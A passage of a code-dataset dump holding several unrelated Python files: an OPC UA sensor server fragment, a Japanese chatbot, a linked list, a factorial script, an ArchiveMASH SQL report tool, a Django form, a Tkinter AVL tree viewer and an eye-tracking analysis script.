0)\r\nvelocity_s2.set_writable()\r\nforce_s2 = sensor_2.add_variable(idx, \"Force\", 0)\r\nforce_s2.set_writable()\r\ntime_s2 = sensor_2.add_variable(idx, \"Time\", 0)\r\n\r\nsensor_3 = node.add_object(idx, \"Sensor_3\")\r\ntemp_s3 = sensor_3.add_variable(idx, \"Tempreture\", 0)\r\nvelocity_s3 = sensor_3.add_variable(idx, \"Velocity\", 0)\r\nvelocity_s3.set_writable()\r\nforce_s3 = sensor_3.add_variable(idx, \"Force\", 0)\r\nforce_s3.set_writable()\r\ntime_s3 = sensor_3.add_variable(idx, \"Time\", 0)\r\n\r\nsensor_1Updater = VarUpdater(temp_s1, time_s1)\r\nsensor_2Updater = VarUpdater(temp_s2, time_s2)\r\nsensor_3Updater = VarUpdater(temp_s3, time_s3)\r\ntry:\r\n start_server()\r\n embed()\r\nfinally:\r\n stop_server()\r\n","repo_name":"egr344/OPC","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3416,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41878655748","text":"#python3\n#辞書データを定義\nbot_dict = {\n 'こんにちは': 'コンニチハ',\n 'ありがとう': 'ドウイタシマシテ',\n 'さようなら': 'サヨウナラ',\n }\n\nwhile True:\n command = input('pybot> ')\n #空文字列で初期化する\n response = ''\n #キーを順番に取り出す\n for message in bot_dict:\n if message in command:\n #対応となる文字列を設定する\n response = bot_dict[message]\n break\n\n #空文字列の場合\n if not response:\n response = 'ナニヲイッテルカワカラナイヨ!!'\n #対応メッセージを表示\n print(response)\n\n #whileループを終了\n if 'さようなら' in command:\n break\n","repo_name":"tokuharu/meganeman","sub_path":"pybot_act2.py","file_name":"pybot_act2.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31288534631","text":"\n#Implement a singly linked list, to be used in other applications\n\nclass Node():\n\t#Implement a basic Node object, that has fields next (the node it points to)\n\t#and a value field\n\n\tdef __init__(self, value=None):\n\t\tself.data = value\n\t\tself.next = None\n\nclass linkedList():\n\t#make a singly linked list\n\n\tdef __init__(self):\n\t\t#Instantiate the linked list\n\t\tself.head = None\n\t\tself.tail = None\n\n\tdef add_to_tail(self, val):\n\t\t#add a node to the list\n\t\tnew_node = Node(val)\n\t\tif self.head == None:\n\t\t\tself.head = new_node\n\t\t\tself.tail = new_node\n\t\telse:\n\t\t\ttracker = self.head\n\t\t\twhile tracker.next != None:\n\t\t\t\ttracker = tracker.next\n\t\t\ttracker.next = new_node\n\t\t\tself.tail = new_node\n\n\n\tdef insert(self, previous_val, new_val):\n\t\t#Insert: given the previous node, insert a new node\n\t\t\n\t\tin_node = Node(new_val)\n\n\t\t#Move through the linked list, searching for previous value in node data fields\n\t\t#If we find a match, we can change the links, thus inserting the new node\n\t\tmover = self.head\n\t\twhile mover.next != None:\n\t\t\tif mover.data == previous_val:\n\t\t\t\tin_node.next = mover.next\n\t\t\t\tmover.next = in_node\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\tmover = mover.next\n\n\t\t#Make sure to check the value of the last node\n\t\tif mover.data == previous_val:\n\t\t\tin_node.next = mover.next\n\t\t\tmover.next = in_node\n\t\t\treturn\n\t\telse:\n\t\t\tprint(\"Invalid 'previous value' input.\")\n\n\n\tdef delete(self, val):\n\t\t#Given a data value, delete the node from the linked list\n\n\t\tif self.head == None:\n\t\t\tprint(\"This list is already empty!\")\n\t\t\treturn\n\n\t\telif self.head.data == val:\n\t\t\tprint(f\"Deleting {val} from Linked List.\")\n\t\t\tself.head = None\n\t\t\treturn\n\n\t\ttracker = self.head\n\n\t\twhile tracker.next != None:\n\t\t\tif tracker.next.data == val:\n\t\t\t\t#Delete the node by undoing its link to previous node\n\t\t\t\t#Account for the case where desired deletion is the tail.\n\t\t\t\tif tracker.next != self.tail:\n\t\t\t\t\tnext_node = tracker.next\n\t\t\t\t\ttracker.next = next_node.next\n\t\t\t\telse:\n\t\t\t\t\ttracker.next = None\n\t\t\t\t\tself.tail = tracker\n\t\t\t\tprint(f\"Deleting {val} from Linked List.\")\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\ttracker = tracker.next\n\n\tdef pop_list(self):\n\t\t#Remove the last element of the linked list\n\n\t\ttracker = self.head\n\t\tahead = tracker.next\n\n\t\twhile ahead.next != None:\n\t\t\ttracker = ahead\n\t\t\tahead = ahead.next\n\t\ttracker.next = None\n\t\tself.tail = tracker\n\n\n\tdef print_list(self):\n\t\t#print the contents of the linked list in order\n\n\t\t#Move through the linkedlist, printing data values\n\t\tplotter = self.head\n\t\twhile plotter.next != None:\n\t\t\tprint(plotter.data)\n\t\t\tplotter = plotter.next\n\t\t#Print the last node's data\n\t\tprint(plotter.data)\n\n\n\"\"\"test = linkedList()\ntest.add_to_tail(5)\ntest.add_to_tail(10)\ntest.insert(10, 15)\ntest.add_to_tail(20)\ntest.print_list()\ntest.delete(20)\ntest.print_list()\"\"\"","repo_name":"michaelsolimano16/linked-list","sub_path":"linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32261617741","text":"'''\nYou have been given a positive integer N.\nYou need to find and print the Factorial of this number.\n'''\n\nn = int(input(\"Enter number to find it's factorial:\"))\n\nfact = 1\n\ni = n\nwhile i>0:\n fact *= i\n i -= 1\nprint(f\"Factorial of {n} = {fact}\")","repo_name":"Shashankhs17/Hackereath-problems_python","sub_path":"Basic/factorial.py","file_name":"factorial.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"45768045866","text":"import pyodbc\nimport pandas as pd\nimport os\nfrom pathlib import Path\nimport datetime\nimport sys\n\n\ndef main():\n print(\"************************************************\")\n print(\" ArchiveMUSH V1.0 - The ArchiveMASH Assistant\")\n print(\"************************************************\")\n\n # Gather SQL Server and DB Name used by ArchiveMASH (Assume we're using the current Windows login creds).\n while True:\n try:\n server_name = input(\"Enter the SQL Server name: \")\n DBName = input(\"Enter the name of the ArchiveMASH database: \")\n # server_name = 'evdasql2016'\n # DBName = 'archivem'\n # Connect to the SQL server\n conn = pyodbc.connect(\n 'Driver={SQL Server};'\n 'Server=' + server_name + ';'\n 'Database=' + DBName + ';'\n 'Trusted_Connection=yes;'\n )\n #'Driver={ODBC Driver 17 for SQL Server};Server=' + server_name + ';Database=' + DBName + ';Trusted_Connection=yes;')\n except:\n print('Connection Unsuccessful.', sys.exc_info()[0])\n continue\n\n else:\n print(f'Connected to {server_name}.')\n break\n\n # Provide list of reports and ask for selection.\n main_menu = ['Migration Status Report', 'Migration Rate Report', 'Change Migration Status']\n user_id = None\n group_id = None\n user_name = \"\"\n\n selection = None\n while not selection:\n selection = get_menu_option(main_menu, \"#########Main Menu#########\")\n\n if selection == 'Migration Rate Report':\n group_selection = None\n group_query = 'SELECT GroupName from Users GROUP BY GroupName'\n group_list = run_simple_query(group_query, conn)\n while not group_selection:\n group_selection = get_menu_option(group_list, \"Specify Migration Group:\")\n group_id = group_selection[0]\n yes_no = ''\n while yes_no.lower() not in ('y', 'n'):\n try:\n yes_no = input('Do you want to run report for a single user? (Y/N): ')\n except yes_no.lower() not in ('y', 'n'):\n print('Invalid Entry. Try again.')\n continue\n\n if yes_no.lower() == 'y':\n user_selection = None\n user_query = \"SELECT UserId, DisplayName FROM users where GroupName = '\" + group_id + \"'\"\n user_list = run_simple_query(user_query, conn)\n while not user_selection:\n user_selection = get_menu_option(user_list, \"Select User: \")\n user_id = user_selection[0]\n user_name = user_selection[1]\n\n # Run selected report.\n sql_run = get_report(selection)\n run_report(sql_run, selection, conn, group_id, user_id, user_name)\n\n\ndef run_report(report_file, name, conn, group_id, user_id,\n user_name): # Function loads and runs report from SQL query file.\n query_text = load_query(report_file)\n query_change = \"\"\n # If there's a userID or GroupID limiter in the query, add those.\n if group_id != None:\n for line in query_text:\n stripped_line = line.strip()\n new_line = stripped_line\n if stripped_line.find(\"\") != -1:\n new_line = stripped_line.replace(\"\", group_id)\n elif (stripped_line.find(\"u.UserID > 0\") != -1 and user_id != None):\n user_text = 'u.UserID = ' + str(user_id)\n new_line = stripped_line.replace(\"u.UserID > 0\", user_text)\n query_change += new_line + \"\\n\"\n query_text = query_change\n query_change = \"\"\n stripped_line = \"\"\n new_line = \"\"\n\n # take the text pulled from the query file and run it.\n with conn.cursor():\n report_query = ''.join(query_text)\n # print(report_query)\n # input()\n if group_id != None:\n content = \"Group: \" + group_id + \" \"\n if user_name != \"\":\n content += \"User: \" + user_name + \"\\n\"\n content = pd.read_sql_query(report_query, conn)\n\n print()\n print(content)\n # Print report to file.\n header_text = write_header(name, group_id, user_name)\n write_report(name, content, header_text)\n\n\n# Show completion status and present location of report.\n\n\ndef create_report(file_name): # function creates a report file and directory.\n file_name = file_name + datetime.datetime.now().strftime(\"-%m-%d-%Y_%H%M%S.csv\")\n parent_dir = os.path.dirname(__file__)\n path = os.path.join(parent_dir, \"Reports\")\n if not os.path.isdir(path):\n os.mkdir(path)\n abs_file = os.path.join(path, file_name)\n return abs_file\n\n\ndef write_header(report_name, group_id, user_name):\n header_text = report_name + \"\\n \\n\"\n if (report_name == 'Migration Rate Report'):\n header_text += \"Group: \" + group_id\n if user_name != \"\":\n header_text += \" ,User: \" + user_name + \"\\n \\n\"\n else:\n header_text += \"\\n \\n\"\n header_text += \"Start Time, Stop Time, Minutes Elapsed \\n\"\n elif (report_name == 'Migration Status Report'):\n header_text += \"Group Name, Archive Name, Archive ID, Status, # Migrated, # Not Migrated, # Failed, MB Migrated \\n\"\n return header_text\n\n\ndef write_report(name, content, header_text): # function writes data to the report file.\n filename = create_report(name)\n content.to_csv(filename, index=False, header=True)\n with open(filename) as lines:\n line = lines.readlines()\n\n line[0] = header_text\n\n with open(filename, \"w\") as lines:\n lines.writelines(line)\n\n\ndef load_query(file_name): # function loads the specified SQL query to be run.\n abs_file = os.path.abspath(os.path.join(\"lib\", file_name))\n query = open(abs_file, 'r')\n return query\n\n\ndef run_simple_query(query, conn):\n output = pd.read_sql_query(query, conn)\n menu_list = output.values.tolist()\n # print(menu_list)\n # stop = input('')\n # for row in cursor:\n # menu_list.append(row)\n return menu_list\n\n\ndef get_menu_option(mlist, mname):\n print(mname)\n for index, opt in enumerate(mlist, start=1):\n print(f\"{index}: {opt}\")\n try:\n user_input: int = int(input(\"Selection: \"))\n user_input -= 1\n print(mlist[user_input])\n if user_input < 0 or user_input >= len(mlist):\n print(f\"{user_input} is an invalid entry. Try again.\")\n return None\n except ValueError as ve:\n print(f\"Could not convert {ve} to an integer. Try again.\")\n return None\n\n return mlist[user_input]\n\n\ndef get_report(report_name):\n reports = {\n \"Migration Status Report\": \"MigrationStatus.sql\",\n \"Migration Rate Report\": \"MigPerformance.sql\"\n }\n sql_run = reports.get(report_name)\n return sql_run\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jajensen34/ArchiveMASHReporter","sub_path":"ArchiveMASH_Reporter/ArchiveMASH_Reporter.py","file_name":"ArchiveMASH_Reporter.py","file_ext":"py","file_size_in_byte":6858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36913109253","text":"from django import forms\nfrom menu_maker.models import MenuItem\n\n\nclass MenuItemForm(forms.ModelForm):\n position = forms.IntegerField(\n initial=-1,\n min_value=-1,\n help_text=\"0-based position amoung children, with -1 to insert last\",\n )\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n position = self.instance.get_position()\n if position:\n self.fields[\"position\"].initial = position[0] - 1\n\n def save(self, commit: bool = True):\n input_pos = self.cleaned_data[\"position\"]\n self.instance.set_new_position(input_pos)\n return super().save(commit)\n\n class Meta:\n model = MenuItem\n exclude = [\"lft\", \"rgt\"]\n","repo_name":"Gvard-Windlass/uptrader_task","sub_path":"menu_maker/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29430212687","text":"import numpy as np\nimport pandas as pd\nfrom .adjustfather import AdjustFather\n\n\nclass InverseAdjust(AdjustFather):\n def __init__(self):\n self.t_num = 1\n\n\nclass DxwInverseAdjust(InverseAdjust):\n def __init__(self, dxw):\n # super().__init__()\n self.n_num_corner = len(dxw.corners)\n self.n_num_edge = len(dxw.edges)\n self.n_num = self.n_num_edge + self.n_num_corner\n self.t_num = len(dxw.params_xy['origin_xy'])\n self.known_num = len(dxw.known_poi)\n self.t_num_half = int(self.t_num / 2)\n\n","repo_name":"zy6p/adjust","sub_path":"pc/inverseadjust.py","file_name":"inverseadjust.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"26200020334","text":"from no import No\r\nimport tkinter as tk\r\nfrom tkinter import font, IntVar\r\n\r\n\r\nclass Arvore:\r\n\r\n def __init__(self, valor=None) -> None:\r\n\r\n self.raiz = None\r\n\r\n # Função pra adicionar um elemto na arvore\r\n\r\n def add(self, valor):\r\n\r\n # adicionar elemento em uma arvore vazia\r\n if self.raiz == None:\r\n self.raiz = No(valor)\r\n\r\n # adicionar elemento em uma arvore que não está vazia\r\n else:\r\n no = No(valor)\r\n raiz = self.raiz\r\n raiz = self.procurar_add(no.valor, raiz)\r\n\r\n if no.valor < raiz.valor:\r\n raiz.esquerda = no\r\n else:\r\n raiz.direita = no\r\n\r\n self.pecorrer_balancear()\r\n\r\n # procura o nó que será adicionado o novo elemento\r\n def procurar_add(self, valor, raiz=None):\r\n if raiz == None:\r\n raiz = self.raiz\r\n\r\n if valor < raiz.valor:\r\n\r\n if raiz.esquerda != None:\r\n\r\n raiz = self.procurar_add(valor, raiz.esquerda)\r\n else:\r\n if raiz.direita != None:\r\n raiz = self.procurar_add(valor, raiz.direita)\r\n\r\n return raiz\r\n\r\n def procurar(self, valor, raiz=None):\r\n\r\n if raiz == None:\r\n raiz = self.raiz\r\n\r\n if valor > raiz.valor:\r\n if raiz.direita != None:\r\n raiz = self.procurar(valor, raiz.direita)\r\n elif valor < raiz.valor:\r\n if raiz.esquerda != None:\r\n raiz = self.procurar(valor, raiz.esquerda)\r\n\r\n if valor == raiz.valor:\r\n return raiz\r\n\r\n # procura a sub-arvore para apagar ate encontrar o valor que quer apagar\r\n\r\n def remover(self, valor, raiz=None):\r\n\r\n if raiz == None:\r\n raiz = self.raiz\r\n\r\n if valor < raiz.valor:\r\n raiz.esquerda = self.remover(valor, raiz.esquerda)\r\n\r\n elif valor > raiz.valor:\r\n raiz.direita = self.remover(valor, raiz.direita)\r\n\r\n else:\r\n\r\n # Se o elemento for uma folha\r\n if raiz.esquerda == None and raiz.direita == None:\r\n if raiz == self.raiz:\r\n self.raiz = None\r\n return None\r\n\r\n # Se o elemento tiver somente filho no lado esquerdo\r\n elif raiz.esquerda != None and raiz.direita == None:\r\n if raiz == self.raiz:\r\n self.raiz = raiz.esquerda\r\n return raiz.esquerda\r\n\r\n # Se o elemento tiver somente filho no lado direito\r\n elif raiz.esquerda == None and raiz.direita != None:\r\n if raiz == self.raiz:\r\n self.raiz = raiz.direita\r\n return raiz.direita\r\n\r\n # Se o elemento tiver dois filhos\r\n else:\r\n menor = self.menor(raiz.direita)\r\n raiz.valor = menor.valor\r\n raiz.direita = self.remover(menor.valor, raiz.direita)\r\n\r\n self.pecorrer_balancear()\r\n return raiz\r\n\r\n def pre_ordem(self, raiz=None):\r\n if raiz == None:\r\n print('Pre-Ordem: ', end=\"\")\r\n raiz = self.raiz\r\n\r\n print(raiz.valor, end=\" \")\r\n\r\n if raiz.esquerda != None:\r\n self.pre_ordem(raiz.esquerda)\r\n\r\n if raiz.direita != None:\r\n self.pre_ordem(raiz.direita)\r\n\r\n def ordem(self, raiz=None):\r\n\r\n if raiz == None:\r\n print('Em Ordem:', end=' ')\r\n raiz = self.raiz\r\n\r\n if raiz.esquerda != None:\r\n self.ordem(raiz.esquerda)\r\n\r\n print(raiz.valor, end=' ')\r\n\r\n if raiz.direita != None:\r\n self.ordem(raiz.direita)\r\n\r\n def pecorrer_balancear(self, raiz=None):\r\n\r\n if raiz == None:\r\n\r\n raiz = self.raiz\r\n\r\n if raiz.esquerda != None:\r\n self.pecorrer_balancear(raiz.esquerda)\r\n\r\n if raiz.direita != None:\r\n self.pecorrer_balancear(raiz.direita)\r\n\r\n self.balancear(raiz)\r\n\r\n def menor(self, raiz=None):\r\n\r\n if raiz == None:\r\n raiz = self.raiz\r\n\r\n if raiz.esquerda != None:\r\n return self.menor(raiz.esquerda)\r\n\r\n if raiz.esquerda == None:\r\n return raiz\r\n\r\n def maior(self, raiz=None):\r\n\r\n if raiz == None:\r\n raiz = self.raiz\r\n\r\n if raiz.direita != None:\r\n return self.maior(raiz.direita)\r\n\r\n if raiz.direita == None:\r\n return raiz\r\n\r\n def quantidade_no(self, raiz=None, cont=1):\r\n\r\n if raiz == None:\r\n raiz = self.raiz\r\n\r\n if raiz.esquerda != None:\r\n cont += 1\r\n cont = self.quantidade_no(raiz.esquerda, cont)\r\n\r\n if raiz.direita != None:\r\n cont += 1\r\n cont = self.quantidade_no(raiz.direita, cont)\r\n\r\n return cont\r\n\r\n def altura(self, raiz=None, cont_esquerda=0):\r\n\r\n if raiz == None:\r\n raiz = self.raiz\r\n\r\n if raiz.esquerda is None and raiz.direita is None:\r\n cont = 1\r\n return cont\r\n\r\n if raiz.esquerda is not None:\r\n\r\n cont = self.altura(raiz.esquerda) + 1\r\n cont_esquerda = cont\r\n\r\n if raiz.direita is not None:\r\n\r\n cont = self.altura(raiz.direita, cont_esquerda) + 1\r\n\r\n if cont_esquerda > cont:\r\n return cont_esquerda\r\n\r\n return cont\r\n\r\n def balancear(self, raiz):\r\n\r\n tamanho_esquerda = 0\r\n tamanho_direita = 0\r\n\r\n if raiz.esquerda != None:\r\n\r\n tamanho_esquerda = self.altura(raiz.esquerda)\r\n\r\n if raiz.direita != None:\r\n\r\n tamanho_direita = self.altura(raiz.direita)\r\n\r\n raiz.fator = tamanho_esquerda - tamanho_direita\r\n\r\n if raiz.fator > 1 and raiz.esquerda.fator == 1:\r\n\r\n self.rotacao_direita(raiz)\r\n\r\n elif raiz.fator < -1 and raiz.direita.fator == -1:\r\n\r\n self.rotacao_esquerda(raiz)\r\n\r\n elif raiz.fator == 2 and (raiz.esquerda.fator == -1 or raiz.esquerda.fator == 0):\r\n\r\n self.rotacao_esquerda(raiz.esquerda)\r\n self.rotacao_direita(raiz)\r\n\r\n elif raiz.fator == -2 and (raiz.direita.fator == 1 or raiz.direita.fator == 0):\r\n\r\n self.rotacao_direita(raiz.direita)\r\n self.rotacao_esquerda(raiz)\r\n\r\n def rotacao_direita(self, raiz):\r\n\r\n raiz.valor, raiz.esquerda.valor = raiz.esquerda.valor, raiz.valor\r\n esquerda_raiz = raiz.esquerda\r\n raiz.esquerda = raiz.esquerda.esquerda\r\n direita = raiz.direita\r\n raiz.direita = esquerda_raiz\r\n raiz.direita.esquerda = raiz.direita.direita\r\n raiz.direita.direita = direita\r\n\r\n def rotacao_esquerda(self, raiz):\r\n\r\n raiz.valor, raiz.direita.valor = raiz.direita.valor, raiz.valor\r\n direita_raiz = raiz.direita\r\n raiz.direita = raiz.direita.direita\r\n esquerda = raiz.esquerda\r\n raiz.esquerda = direita_raiz\r\n raiz.esquerda.direita = raiz.esquerda.esquerda\r\n raiz.esquerda.esquerda = esquerda\r\n\r\n def exibir_arvore(self, raiz=None):\r\n\r\n def adicionar_arvore():\r\n\r\n valor = int(caixa_entrada.get())\r\n self.add(valor)\r\n canvas.delete(\"all\")\r\n raiz = self.raiz\r\n desenhar_no(raiz, 680, 50, 200, 100)\r\n informacoes()\r\n\r\n def remover_arvore():\r\n\r\n valor = int(caixa_entrada.get())\r\n self.remover(valor)\r\n canvas.delete(\"all\")\r\n raiz = self.raiz\r\n desenhar_no(raiz, 680, 50, 200, 100)\r\n informacoes()\r\n\r\n def informacoes():\r\n\r\n altura_var.set(self.altura())\r\n maior_var.set(self.maior().valor)\r\n menor_var.set(self.menor().valor)\r\n quantidade_var.set(self.quantidade_no())\r\n\r\n def mostrar_no():\r\n\r\n valor = int(caixa_entrada.get())\r\n no_buscado = self.procurar(valor)\r\n canvas.delete(\"all\")\r\n raiz = self.raiz\r\n desenhar_no(raiz, 680, 50, 200, 100, no_buscado)\r\n informacoes()\r\n\r\n # Função auxiliar para desenhar os nós da árvore\r\n\r\n def desenhar_no(no, x, y, dx, dy, no_buscado=None):\r\n\r\n raio = 18\r\n cor = \"#f2f2f2\"\r\n cor_texto = \"black\"\r\n\r\n if no is not None:\r\n espessura_borda = 2\r\n if no_buscado == no:\r\n cor = \"#ff4A4a\"\r\n cor_texto = \"#f2f2f2\"\r\n canvas.create_oval(x - raio, y - raio, x + raio,\r\n y + raio, fill=cor, width=espessura_borda)\r\n canvas.create_text(x, y, text=(str(no.valor)),\r\n font='bold', fill=cor_texto)\r\n\r\n if no.esquerda:\r\n canvas.create_line(x, y + raio, x - dx,\r\n y + dy - raio, width=2)\r\n desenhar_no(no.esquerda, x - dx, y +\r\n dy, dx/2, dy, no_buscado)\r\n if no.direita:\r\n canvas.create_line(x, y + raio, x + dx,\r\n y + dy - raio, width=2)\r\n desenhar_no(no.direita, x + dx, y +\r\n dy, dx/2, dy, no_buscado)\r\n\r\n raiz = self.raiz\r\n\r\n janela = tk.Tk()\r\n janela.configure(bg='#0a0c0d')\r\n font_grande = font.Font(size=16)\r\n font_padrao = font.Font(size=15)\r\n\r\n altura_var = IntVar()\r\n maior_var = IntVar()\r\n menor_var = IntVar()\r\n quantidade_var = IntVar()\r\n altura_var.set(0)\r\n maior_var.set(0)\r\n menor_var.set(0)\r\n quantidade_var.set(0)\r\n\r\n titulo = tk.Label(janela, text='Árvore binária de busca balanceada',\r\n font=font_grande, fg='#f2f2f2', bg='#3d3334').pack(side='top')\r\n\r\n # Criação da janela e do canvas\r\n canvas = tk.Canvas(janela, width=1350, height=800, bg=\"#348e91\")\r\n canvas.pack(side='top')\r\n\r\n # Desenhar a árvore\r\n desenhar_no(raiz, 680, 50, 200, 100)\r\n\r\n tex1 = tk.Label(janela, text='Altura da árvore: ', bg=\"#348e91\",\r\n font=font_padrao, fg=\"#f2f2f2\").place(x=10, y=50)\r\n altura = tk.Label(janela, textvariable=altura_var, bg=\"#348e91\",\r\n font=font_padrao, fg=\"#f2f2f2\").place(x=160, y=50)\r\n tex2 = tk.Label(janela, text='Maior valor: ', bg=\"#348e91\",\r\n font=font_padrao, fg=\"#f2f2f2\").place(x=10, y=80)\r\n maior = tk.Label(janela, textvariable=maior_var, bg=\"#348e91\",\r\n font=font_padrao, fg=\"#f2f2f2\").place(x=130, y=80)\r\n tex3 = tk.Label(janela, text='Menor valor: ', bg=\"#348e91\",\r\n font=font_padrao, fg=\"#f2f2f2\").place(x=10, y=110)\r\n menor = tk.Label(janela, textvariable=menor_var, bg=\"#348e91\",\r\n font=font_padrao, fg=\"#f2f2f2\").place(x=130, y=110)\r\n tex4 = tk.Label(janela, text='Quantidade de nó(s): ', bg=\"#348e91\",\r\n font=font_padrao, fg=\"#f2f2f2\").place(x=10, y=140)\r\n quantidade = tk.Label(janela, textvariable=quantidade_var, bg=\"#348e91\",\r\n font=font_padrao, fg=\"#f2f2f2\").place(x=205, y=140)\r\n\r\n procurar = tk.Button(janela, text='Procurar', command=mostrar_no,\r\n bg='blue', fg='#f2f2f2', font=('Arial', 13), width=8).place(x=550, y=625)\r\n remover = tk.Button(janela, text='Remover', command=remover_arvore,\r\n bg='red', fg='#f2f2f2', font=('Arial', 13), width=8).place(x=638, y=625)\r\n adicionar = tk.Button(janela, text='Adicionar', command=adicionar_arvore,\r\n bg='#1c5052', fg='#f2f2f2', font=('Arial', 13)).place(x=724, y=625)\r\n caixa_entrada = tk.Entry(janela, bg='#f2f2f2', font=(\r\n 'Arial', 16), justify='center', width=21)\r\n caixa_entrada.place(x=550, y=590)\r\n\r\n # Executar a janela\r\n janela.mainloop()\r\n","repo_name":"Fabricio-Andrade-Sousa/arvore-binaria-de-busca","sub_path":"arvore_binaria.py","file_name":"arvore_binaria.py","file_ext":"py","file_size_in_byte":12098,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42069637503","text":"import scipy.io as sp\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport os\nfrom collections import defaultdict\nfrom usefulFns import *\n\nallTrialsData, header = loadMatFile('Meetz_2021_1028_1.mat')\n\n\n\n# code to check whether valid RT are being rewarded or not\n# check EOT to make sure that trialEnd is not including 'wrong/distracted' \ncorrecttNoRwrd = []\nfor n,currTrial in enumerate(allTrialsData.item()[0]):\n extendedEOT = currTrial['extendedEOT'].item()['data']\n trial = currTrial['trial'].item()['data'].item()\n if extendedEOT == 6 and fieldInTrial(['reactTimeMS'], currTrial):\n reactTimeMS = currTrial['reactTimeMS'].item()['data'].item()\n if reactTimeMS > 0 and reactTimeMS < 500:\n correcttNoRwrd.append(n)\n\n# List of trials with early's but Target appears on screen\nRTs = []\nfor n,currTrial in enumerate(allTrialsData.item()[0]):\n trial = currTrial['trial'].item()['data'].item()\n extendedEOT = currTrial['extendedEOT'].item()['data'].item()\n if extendedEOT == 6 and fieldInTrial(['targetOn'], currTrial):\n RTs.append(n)\n\n# trial RTs with early's but Target appears on screen\nearlyWithRT = []\nfor n, currTrial in enumerate(allTrialsData.item()[0]):\n extendedEOT = currTrial['extendedEOT'].item()['data']\n if extendedEOT == 6 and fieldInTrial(['targetOn', 'reactTimeMS'], currTrial):\n earlyWithRT.append((n, currTrial['reactTimeMS'].item()['data'].item()))\n\n# correct trials with short RT\ncorrectShortRT = []\nfor n, currTrial in enumerate(allTrialsData.item()[0]):\n extendedEOT = currTrial['extendedEOT'].item()['data']\n trial = currTrial['trial'].item()['data'].item()\n if extendedEOT == 0 and trial['catchTrial'] != 1:\n reactTimeMS = currTrial['reactTimeMS'].item()['data'].item()\n if reactTimeMS <100:\n correctShortRT.append((n, reactTimeMS))\n\n# EyePos for a trial\ncurrTrial = allTrialsData.item()[0][i]\neyesXYDeg = defaultdict(list)\neyeLX = currTrial['eyeLXData'].item()['data'].item() \neyeLY = currTrial['eyeLYData'].item()['data'].item()\neyeRX = currTrial['eyeRXData'].item()['data'].item()\neyeRY = currTrial['eyeRYData'].item()['data'].item()\neyeLeftCal = currTrial['eyeLeftCalibrationData'].item()['data'].item()['cal'].item()\neyeRightCal = currTrial['eyeRightCalibrationData'].item()['data'].item()['cal'].item()\ncount = min([len(eyeLX), len(eyeLY), len(eyeRX), len(eyeRY)])\n\nfor s in range(0, count):\n xDegConvert = (eyeLX[s] * eyeLeftCal['m11'].item()) + (eyeLY[s] * eyeLeftCal['m21'].item()) + eyeLeftCal['tX'].item()\n eyesXYDeg['leftX'].append(xDegConvert)\n yDegConvert = (eyeLX[s] * eyeLeftCal['m12'].item()) + (eyeLY[s] * eyeLeftCal['m22'].item()) + eyeLeftCal['tY'].item()\n eyesXYDeg['leftY'].append(yDegConvert)\n xDegConvert = (eyeRX[s] * eyeRightCal['m11'].item()) + (eyeRY[s] * eyeRightCal['m21'].item()) + eyeRightCal['tX'].item()\n eyesXYDeg['rightX'].append(xDegConvert)\n yDegConvert = (eyeRX[s] * eyeRightCal['m12'].item()) + (eyeRY[s] * eyeRightCal['m22'].item()) + eyeRightCal['tY'].item()\n eyesXYDeg['rightY'].append(yDegConvert)\n\n# EyePos for a list of trials indexes\neyePosDurTarget = []\nfor i in correctShortRT:\n trialNumber, reactTime = i\n currTrial = allTrialsData.item()[0][trialNumber]\n leftXDeg = []\n leftYDeg = []\n rightXDeg = []\n rightYDeg = []\n eyeLX = currTrial['eyeLXData'].item()['data'].item() \n eyeLY = currTrial['eyeLYData'].item()['data'].item()\n eyeRX = currTrial['eyeRXData'].item()['data'].item()\n eyeRY = currTrial['eyeRYData'].item()['data'].item()\n eyeLeftCal = currTrial['eyeLeftCalibrationData'].item()['data'].item()['cal'].item()\n eyeRightCal = currTrial['eyeRightCalibrationData'].item()['data'].item()['cal'].item()\n\n count = min([len(eyeLX), len(eyeLY), len(eyeRX), len(eyeRY)])\n for l in range(0, count):\n xDegConvert = (eyeLX[l] * eyeLeftCal['m11'].item()) + (eyeLY[l] * eyeLeftCal['m21'].item()) + eyeLeftCal['tX'].item()\n leftXDeg.append(xDegConvert)\n yDegConvert = (eyeLX[l] * eyeLeftCal['m12'].item()) + (eyeLY[l] * eyeLeftCal['m22'].item()) + eyeLeftCal['tY'].item()\n leftYDeg.append(yDegConvert)\n # for r in range(0, count):\n xDegConvert = (eyeRX[l] * eyeRightCal['m11'].item()) + (eyeRY[l] * eyeRightCal['m21'].item()) + eyeRightCal['tX'].item()\n rightXDeg.append(xDegConvert)\n yDegConvert = (eyeRX[l] * eyeRightCal['m12'].item()) + (eyeRY[l] * eyeRightCal['m22'].item()) + eyeRightCal['tY'].item()\n rightYDeg.append(yDegConvert)\n\n fixate = currTrial['fixate'].item()['timeMS'].item()\n trialStart = currTrial['trialStart'].item()['timeMS'].item()\n fixateTimeWRTEyePos = math.floor((fixate - trialStart)/2)\n fixateTimeForIndex = fixateTimeWRTEyePos\n windowWidth = currTrial['fixWindowData'].item()['data'].item()['windowDeg'].item()['size'].item()['width'].item()\n windowHeight = currTrial['fixWindowData'].item()['data'].item()['windowDeg'].item()['size'].item()['height'].item()\n for index, 